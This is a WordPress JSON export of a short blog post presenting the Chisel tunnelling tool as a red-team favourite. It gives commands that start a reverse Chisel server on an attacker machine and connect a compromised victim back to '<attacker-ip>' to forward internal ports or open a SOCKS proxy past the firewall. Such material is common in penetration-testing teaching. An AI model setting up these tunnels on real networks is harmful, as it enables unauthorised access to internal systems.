{"id":161,"date":"2022-10-08T00:36:51","date_gmt":"2022-10-08T00:36:51","guid":{"rendered":"https:\/\/vasanthselvaraj.com\/?p=161"},"modified":"2022-10-08T00:36:55","modified_gmt":"2022-10-08T00:36:55","slug":"chisel-favourite-red-team-tool","status":"publish","type":"post","link":"https:\/\/vasanthselvaraj.com\/?p=161","title":{"rendered":"Chisel &#8211; Favourite red team tool"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full is-style-rounded\"><img decoding=\"async\" loading=\"lazy\" width=\"648\" height=\"264\" src=\"http:\/\/vasanthselvaraj.com\/wp-content\/uploads\/2022\/10\/image.png\" alt=\"Chisel\" class=\"wp-image-160\" srcset=\"https:\/\/vasanthselvaraj.com\/wp-content\/uploads\/2022\/10\/image.png 648w, https:\/\/vasanthselvaraj.com\/wp-content\/uploads\/2022\/10\/image-300x122.png 300w\" sizes=\"(max-width: 648px) 100vw, 648px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>Chisel is a fast TCP\/UDP tunnel, transported over HTTP, secured via SSH. Single executable for both client \/ server connection. More details about this tool can be found <a href=\"https:\/\/github.com\/jpillora\/chisel\" target=\"_blank\" rel=\"noreferrer noopener\">here<\/a>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Why is it useful ?<\/h2>\n\n\n\n<p>Corporate network is not accessible from internet and its blocked by firewall. Chisel is helpful creating the proxy connection and chisel can make connection to any internal network which is accessible from the box.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">How to use?<\/h2>\n\n\n\n<p>Download the chisel executable on the attack and victim machine. Normally access to victim machine via reverse shell .<\/p>\n\n\n\n<p>On Attacker Machine, standup the Chisel Server on port 8081 <\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-style-default\"><p><code>Chisel Server -p 8081 --reverse<\/code><\/p><\/blockquote>\n\n\n\n<p>On victim machine, multiple ways to launch the chisel client<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p><code>Chisel Client &lt;attackerip&gt;:8081 R:80:&lt;Target internal network&gt;:&lt;Target internal port&gt;<\/code><\/p><\/blockquote>\n\n\n\n<p>Above command makes attacker machine listens on port 80 and forwards all the connection to victim&#8217;s target machine on specified port<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p><code>chisel client &lt;attacker-ip&gt;:8081 R:socks<\/code><\/p><\/blockquote>\n\n\n\n<p>Above command creates socks5 listener on attacker machine on 1080 port and then connects to victim&#8217;s internal machine. Accessible via proxychains and foxyproxy browser.<\/p>\n\n\n\n<p>e.g. proxychains git clone &lt;victim&#8217;s internal ip&gt; or proxychains curl &lt;victim&#8217;s internal ip&gt;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Conclusion<\/h2>\n\n\n\n<p>Chisel is swiss army knife and its red team favourite tool to establish proxy connections to internal network where its mostly blocked by the firewall.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Introduction Chisel is a fast TCP\/UDP tunnel, transported over HTTP, secured via SSH. Single executable for both client \/ server connection. More details about this tool can be found here. Why is it useful ? Corporate network is not accessible from internet and its blocked by firewall. Chisel is helpful creating the proxy connection and&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_newsletter_tier_id":0},"categories":[4],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.8.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Chisel - Favourite red team tool - Vasanth Selvaraj<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/vasanthselvaraj.com\/?p=161\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Chisel - Favourite red team tool - Vasanth Selvaraj\" \/>\n<meta property=\"og:description\" content=\"Introduction Chisel is a fast TCP\/UDP tunnel, transported over HTTP, secured via SSH. Single executable for both client \/ server connection. More details about this tool can be found here. Why is it useful ? Corporate network is not accessible from internet and its blocked by firewall. Chisel is helpful creating the proxy connection and...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/vasanthselvaraj.com\/?p=161\" \/>\n<meta property=\"og:site_name\" content=\"Vasanth Selvaraj\" \/>\n<meta property=\"article:published_time\" content=\"2022-10-08T00:36:51+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-10-08T00:36:55+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/vasanthselvaraj.com\/wp-content\/uploads\/2022\/10\/image.png\" \/>\n<meta name=\"author\" content=\"VS\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"VS\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/vasanthselvaraj.com\/?p=161\",\"url\":\"https:\/\/vasanthselvaraj.com\/?p=161\",\"name\":\"Chisel - Favourite red team tool - Vasanth Selvaraj\",\"isPartOf\":{\"@id\":\"https:\/\/box2411.temp.domains\/~vasselva\/#website\"},\"datePublished\":\"2022-10-08T00:36:51+00:00\",\"dateModified\":\"2022-10-08T00:36:55+00:00\",\"author\":{\"@id\":\"https:\/\/box2411.temp.domains\/~vasselva\/#\/schema\/person\/4f1389c368b6d56abbf122ef1ffddb0d\"},\"breadcrumb\":{\"@id\":\"https:\/\/vasanthselvaraj.com\/?p=161#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/vasanthselvaraj.com\/?p=161\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/vasanthselvaraj.com\/?p=161#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/box2411.temp.domains\/~vasselva\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Chisel &#8211; Favourite red team tool\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/box2411.temp.domains\/~vasselva\/#website\",\"url\":\"https:\/\/box2411.temp.domains\/~vasselva\/\",\"name\":\"Vasanth Selvaraj\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/box2411.temp.domains\/~vasselva\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/box2411.temp.domains\/~vasselva\/#\/schema\/person\/4f1389c368b6d56abbf122ef1ffddb0d\",\"name\":\"VS\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/box2411.temp.domains\/~vasselva\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/f363d6f3a44a96f83133417d14b78c63?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/f363d6f3a44a96f83133417d14b78c63?s=96&d=mm&r=g\",\"caption\":\"VS\"},\"url\":\"https:\/\/vasanthselvaraj.com\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Chisel - Favourite red team tool - Vasanth Selvaraj","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/vasanthselvaraj.com\/?p=161","og_locale":"en_US","og_type":"article","og_title":"Chisel - Favourite red team tool - Vasanth Selvaraj","og_description":"Introduction Chisel is a fast TCP\/UDP tunnel, transported over HTTP, secured via SSH. Single executable for both client \/ server connection. More details about this tool can be found here. Why is it useful ? Corporate network is not accessible from internet and its blocked by firewall. Chisel is helpful creating the proxy connection and...","og_url":"https:\/\/vasanthselvaraj.com\/?p=161","og_site_name":"Vasanth Selvaraj","article_published_time":"2022-10-08T00:36:51+00:00","article_modified_time":"2022-10-08T00:36:55+00:00","og_image":[{"url":"http:\/\/vasanthselvaraj.com\/wp-content\/uploads\/2022\/10\/image.png"}],"author":"VS","twitter_card":"summary_large_image","twitter_misc":{"Written by":"VS","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/vasanthselvaraj.com\/?p=161","url":"https:\/\/vasanthselvaraj.com\/?p=161","name":"Chisel - Favourite red team tool - Vasanth Selvaraj","isPartOf":{"@id":"https:\/\/box2411.temp.domains\/~vasselva\/#website"},"datePublished":"2022-10-08T00:36:51+00:00","dateModified":"2022-10-08T00:36:55+00:00","author":{"@id":"https:\/\/box2411.temp.domains\/~vasselva\/#\/schema\/person\/4f1389c368b6d56abbf122ef1ffddb0d"},"breadcrumb":{"@id":"https:\/\/vasanthselvaraj.com\/?p=161#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/vasanthselvaraj.com\/?p=161"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/vasanthselvaraj.com\/?p=161#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/box2411.temp.domains\/~vasselva"},{"@type":"ListItem","position":2,"name":"Chisel &#8211; Favourite red team tool"}]},{"@type":"WebSite","@id":"https:\/\/box2411.temp.domains\/~vasselva\/#website","url":"https:\/\/box2411.temp.domains\/~vasselva\/","name":"Vasanth Selvaraj","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/box2411.temp.domains\/~vasselva\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/box2411.temp.domains\/~vasselva\/#\/schema\/person\/4f1389c368b6d56abbf122ef1ffddb0d","name":"VS","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/box2411.temp.domains\/~vasselva\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/f363d6f3a44a96f83133417d14b78c63?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f363d6f3a44a96f83133417d14b78c63?s=96&d=mm&r=g","caption":"VS"},"url":"https:\/\/vasanthselvaraj.com\/?author=1"}]}},"jetpack_sharing_enabled":true,"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/vasanthselvaraj.com\/index.php?rest_route=\/wp\/v2\/posts\/161"}],"collection":[{"href":"https:\/\/vasanthselvaraj.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/vasanthselvaraj.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/vasanthselvaraj.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/vasanthselvaraj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=161"}],"version-history":[{"count":5,"href":"https:\/\/vasanthselvaraj.com\/index.php?rest_route=\/wp\/v2\/posts\/161\/revisions"}],"predecessor-version":[{"id":168,"href":"https:\/\/vasanthselvaraj.com\/index.php?rest_route=\/wp\/v2\/posts\/161\/revisions\/168"}],"wp:attachment":[{"href":"https:\/\/vasanthselvaraj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=161"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/vasanthselvaraj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=161"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/vasanthselvaraj.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=161"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}